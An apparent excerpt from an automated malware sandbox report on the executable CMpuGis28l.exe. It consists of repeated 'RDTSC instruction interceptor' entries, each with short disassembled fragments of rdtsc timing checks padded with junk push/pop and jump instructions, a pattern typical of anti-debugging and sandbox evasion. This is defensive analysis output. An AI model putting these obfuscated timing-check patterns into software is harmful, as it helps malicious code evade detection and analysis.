Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BC5FB second address: 18BC5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BCA6D second address: 18BCA83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334BA0030h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BCA83 second address: 18BCA8D instructions: 0x00000000 rdtsc 0x00000002 je 00007F9334DAF99Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C2D64 second address: 18C2D78 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9334BA0026h 0x00000008 jns 00007F9334BA0026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C1620 second address: 18C162C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9334DAF996h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187533F second address: 1875343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1875343 second address: 1875384 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F9334DAF998h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a xor dword ptr [ebp+12A21829h], edx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9334DAF99Bh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1875384 second address: 187538E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9334BA0026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C2A0D second address: 18C2A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C2A15 second address: 18C2A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5F5D second address: 18C5F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5F63 second address: 18C5F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5F67 second address: 18C5F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5796 second address: 18C57A0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD263 second address: 18CD272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jl 00007F9334DAF996h 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD272 second address: 18CD278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD278 second address: 18CD280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD280 second address: 18CD286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE01B second address: 18CE01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE2C7 second address: 18CE2D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE58E second address: 18CE592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE592 second address: 18CE5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F9334BA0026h 0x0000000e jne 00007F9334BA0026h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE5A6 second address: 18CE5AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE5AA second address: 18CE5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE5B0 second address: 18CE5B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CEB70 second address: 18CEB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CEB82 second address: 18CEB86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CEB86 second address: 18CEB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D318C second address: 18D31B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A7h 0x00000007 jno 00007F9334DAF996h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jng 00007F9334DAF996h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D31B7 second address: 18D31CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D31CD second address: 18D31E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D238C second address: 18D2391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2391 second address: 18D2397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2669 second address: 18D2692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pushad 0x00000008 jmp 00007F9334BA0033h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2BCA second address: 18D2BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2D56 second address: 18D2D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F9334BA0026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2EBD second address: 18D2EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2EC2 second address: 18D2ED8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F9334BA0031h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2ED8 second address: 18D2EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2EE6 second address: 18D2EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D7C11 second address: 18D7C1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D7C1C second address: 18D7C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9334BA0026h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F9334BA0039h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D7C46 second address: 18D7C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F9334DAF9A0h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E19BC second address: 18E19D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F9334BA0034h 0x00000010 jo 00007F9334BA002Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1832152 second address: 183216C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334DAF9A5h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183216C second address: 1832172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DFC74 second address: 18DFCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F9334DAF9A7h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 jnl 00007F9334DAF99Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DFFAC second address: 18DFFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DFFB0 second address: 18DFFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9334DAF9A3h 0x0000000d pop edi 0x0000000e push ebx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E0299 second address: 18E02B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E02B1 second address: 18E02B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E0575 second address: 18E057B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E057B second address: 18E05B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF9A6h 0x00000009 popad 0x0000000a jc 00007F9334DAF99Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push esi 0x00000016 pushad 0x00000017 jmp 00007F9334DAF99Bh 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E17DA second address: 18E17DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E17DE second address: 18E17E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E17E2 second address: 18E1843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334BA0030h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F9334BA0033h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9334BA0036h 0x00000020 jmp 00007F9334BA0037h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E1843 second address: 18E1847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E1847 second address: 18E185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DF733 second address: 18DF73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7850 second address: 18E7854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7854 second address: 18E7858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E737A second address: 18E7380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7380 second address: 18E7388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7388 second address: 18E73A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Ch 0x00000009 jl 00007F9334BA0026h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18F5895 second address: 18F589A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18F589A second address: 18F58A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FB963 second address: 18FB967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF685 second address: 18FF6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9334BA0030h 0x0000000d jne 00007F9334BA0032h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF6AF second address: 18FF6B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF6B9 second address: 18FF6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF6BD second address: 18FF6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F9334DAF996h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 182ECF3 second address: 182ED10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Eh 0x00000009 jmp 00007F9334BA002Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1907307 second address: 1907311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 190DEEE second address: 190DEF8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9334BA0026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 190DEF8 second address: 190DF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334DAF9A6h 0x0000000b jmp 00007F9334DAF99Ch 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F9334DAF99Ah 0x00000018 jo 00007F9334DAF996h 0x0000001e popad 0x0000001f popad 0x00000020 push esi 0x00000021 push edx 0x00000022 jmp 00007F9334DAF9A9h 0x00000027 pop edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 190DF55 second address: 190DF5F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9334BA0026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1915691 second address: 19156AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F9334DAF996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9334DAF99Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19156AC second address: 19156F8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9334BA0028h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jns 00007F9334BA002Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jnp 00007F9334BA002Ch 0x00000019 jne 00007F9334BA0028h 0x0000001f jmp 00007F9334BA002Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 jmp 00007F9334BA002Bh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1914085 second address: 191409D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9334DAF9A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19144E4 second address: 19144E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19147D1 second address: 19147EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334DAF9A0h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 191541A second address: 1915450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F9334BA0033h 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F9334BA0026h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1915450 second address: 191546D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9334DAF996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jg 00007F9334DAF9A8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9334DAF99Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 191B470 second address: 191B474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 191B474 second address: 191B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19560D1 second address: 19560D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19560D8 second address: 195610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9334DAF99Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9334DAF9A7h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 195610A second address: 195611A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 196900C second address: 1969012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1969012 second address: 1969019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1969019 second address: 196901E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 196901E second address: 1969024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1968E72 second address: 1968E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1968E7B second address: 1968E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1968E7F second address: 1968EAC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9334DAF996h 0x00000008 jng 00007F9334DAF996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9334DAF9A2h 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F9334DAF996h 0x00000020 rdtsc
